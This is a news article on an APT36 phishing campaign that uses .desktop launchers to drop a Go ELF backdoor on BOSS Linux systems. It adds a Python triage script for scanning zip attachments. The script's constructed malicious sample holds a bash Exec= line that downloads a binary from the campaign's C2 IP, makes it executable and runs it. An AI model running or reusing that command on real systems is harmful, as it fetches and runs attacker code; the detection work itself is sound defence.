A cyber espionage campaign attributed to APT36, also known as Transparent Tribe, is currently targeting Indian defense personnel and organizations. The Pakistan-based group has extended its targeting to systems running BOSS Linux (Bharat Operating System Solutions), a Debian-derived Indian distribution widely used by government entities in India.
The addition of malware built specifically for Linux marks a significant escalation in the group's tactics. The findings were reported by cybersecurity firm Cyfirma and subsequently covered by several cybersecurity news outlets.
Cyfirma researchers first identified this wave of attacks on June 7, 2025. According to their analysis, the attackers rely on phishing emails to lure their targets. Victims receive a message carrying a compressed archive, typically named “Cyber-Security-Advisory.zip,” which contains a malicious ‘.desktop’ file. On Linux desktops a .desktop file is a launcher: opening it makes the desktop environment run whatever command its Exec= line specifies, so it can behave like an executable while looking like a document shortcut.
When the user opens the launcher, two things happen at once. A benign-looking PowerPoint file is downloaded and opened as a decoy, so the victim sees what appears to be a legitimate document and has no reason to suspect anything else is running.
In the background, the same launcher downloads a malicious program named BOSS.elf, saved locally as client.elf, and executes it. This Executable and Linkable Format (ELF) binary, the Linux counterpart of a Windows .exe, is written in Go. Its purpose is to compromise the host and give the attackers unauthorized remote access.
The malware attempts to connect to a command-and-control server at the IP address 101.99.92.182 on port 12520. Analysts have also identified the domain sorlastore.com as part of the infrastructure APT36 uses in this campaign against Indian defense personnel and systems.
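The following Python triage script is an added example and is not part of Cyfirma's report or of this article. It unpacks a zip attachment held in memory, parses every .desktop launcher it contains and flags the download-decoy-and-execute pattern described above. The two embedded .desktop files are constructed samples: the malicious one imitates the described behaviour but is not the real file and does not reproduce its actual Exec= line or download URLs. The indicator list (the IP, domain and file names quoted above) comes from the article; the remaining heuristics (shell wrapper, curl/wget, chmod, backgrounding, scratch directories, document-name masquerade) are generic assumptions of this example.

```python
import configparser
import io
import re
import zipfile
from dataclasses import dataclass, field

# Indicators quoted in the article. Everything else below is a generic heuristic.
KNOWN_IOCS = {"101.99.92.182", "sorlastore.com", "BOSS.elf", "client.elf"}

SHELL_WRAPPER = re.compile(r"\b(?:ba)?sh\s+-c\b")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
CHMOD_EXEC = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")
BACKGROUND = re.compile(r"(?<![&>])&(?!&)|\bnohup\b")   # a single '&' or nohup
SCRATCH_PATH = re.compile(r"/(?:tmp|var/tmp|dev/shm)/")
DOC_VIEWER = re.compile(r"\b(?:xdg-open|libreoffice|soffice|evince|okular)\b")
DOC_EXT = re.compile(r"\.(?:pptx?|docx?|xlsx?|pdf)$", re.IGNORECASE)


@dataclass
class Verdict:
    path: str
    findings: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def parse_desktop(text: str):
    """Return the [Desktop Entry] group of a .desktop file as a dict, or None."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # .desktop keys are case-sensitive; keep them as written
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        return None
    return dict(cp["Desktop Entry"])


def analyse_desktop(path: str, text: str) -> Verdict:
    """Static checks only: the launcher is parsed, never executed."""
    v = Verdict(path)
    entry = parse_desktop(text)
    if entry is None:
        v.findings.append("no [Desktop Entry] group")
        return v
    exec_line = entry.get("Exec", "")
    name = entry.get("Name", "")
    checks = [
        (SHELL_WRAPPER, "Exec wraps a shell command (sh -c / bash -c)"),
        (DOWNLOADER, "Exec fetches content with curl/wget"),
        (CHMOD_EXEC, "Exec marks a file executable (chmod)"),
        (BACKGROUND, "Exec backgrounds a process (& / nohup)"),
        (SCRATCH_PATH, "Exec uses a scratch directory (/tmp, /var/tmp, /dev/shm)"),
    ]
    for pattern, message in checks:
        if pattern.search(exec_line):
            v.findings.append(message)
    if DOWNLOADER.search(exec_line) and DOC_VIEWER.search(exec_line):
        v.findings.append("download-then-open pattern: decoy document plus payload")
    for ioc in sorted(KNOWN_IOCS):
        if ioc.lower() in exec_line.lower():
            v.findings.append(f"known APT36 indicator in Exec: {ioc}")
    if entry.get("Type") == "Application" and DOC_EXT.search(name):
        v.findings.append(f"launcher Name masquerades as a document: {name}")
    return v


def scan_zip_bytes(data: bytes) -> list:
    """Analyse every .desktop entry in a zip archive held in memory."""
    verdicts = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".desktop"):
                text = zf.read(info).decode("utf-8", errors="replace")
                verdicts.append(analyse_desktop(info.filename, text))
    return verdicts


# Constructed samples: the malicious one imitates the behaviour the article
# describes but is NOT the real file and does not reproduce its Exec line.
MALICIOUS_SAMPLE = """[Desktop Entry]
Type=Application
Name=Cyber-Security-Advisory.pptx
Terminal=false
Exec=bash -c "curl -s -o /tmp/advisory.pptx http://sorlastore.com/advisory.pptx && xdg-open /tmp/advisory.pptx & curl -s -o /tmp/client.elf http://101.99.92.182/BOSS.elf && chmod +x /tmp/client.elf && /tmp/client.elf &"
"""

BENIGN_SAMPLE = """[Desktop Entry]
Type=Application
Name=Firefox Web Browser
Exec=firefox %u
Terminal=false
"""


def build_sample_zip() -> bytes:
    """Package both samples the way a phishing attachment would carry them."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Cyber-Security-Advisory/Cyber-Security-Advisory.desktop", MALICIOUS_SAMPLE)
        zf.writestr("Cyber-Security-Advisory/firefox.desktop", BENIGN_SAMPLE)
    return buf.getvalue()


if __name__ == "__main__":
    for verdict in scan_zip_bytes(build_sample_zip()):
        print(f"{verdict.path}: {'SUSPICIOUS' if verdict.suspicious else 'clean'}")
        for finding in verdict.findings:
            print(f"  - {finding}")
```

Because the script only parses text and never runs the launcher, it is safe to point at quarantined attachments. A clean verdict means "no obvious pattern", not "benign": an Exec= line can hide the same behaviour behind a base64-decoded string or a second-stage script it downloads, so the regex heuristics should be paired with the indicator list and with endpoint monitoring for processes spawned from /tmp.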
The multi-stage design is intended to evade security controls and minimize detection, giving the attackers prolonged access to sensitive systems. The move to Linux-targeted malware signals a meaningful increase in APT36's capabilities and raises the risk to critical government and defense networks.
Transparent Tribe has been tracked since Operation C-Major in March 2016, in which the group used spear-phishing and Adobe Reader vulnerabilities to deliver spyware to Indian military personnel. More recently, in July 2024, it disguised Android spyware as popular mobile applications to harvest sensitive data, suggesting an expansion of targets beyond military units.
As the group continues to adapt its methods and broaden its scope, organizations, particularly public-sector bodies that rely on Linux-based systems, should treat these threats seriously. Robust security practices and comprehensive threat-detection tooling are essential to defend against evolving adversary tactics.
Jason Soroko, Senior Fellow at a major cybersecurity firm, remarked on the necessity of preventive measures for Linux systems. By disabling auto-execution of desktop shortcuts and enforcing application allowlists, organizations can bolster their defenses. Furthermore, utilizing PowerPoint viewers in read-only mode and ensuring downloads from untrusted networks are restricted can enhance overall security protocols.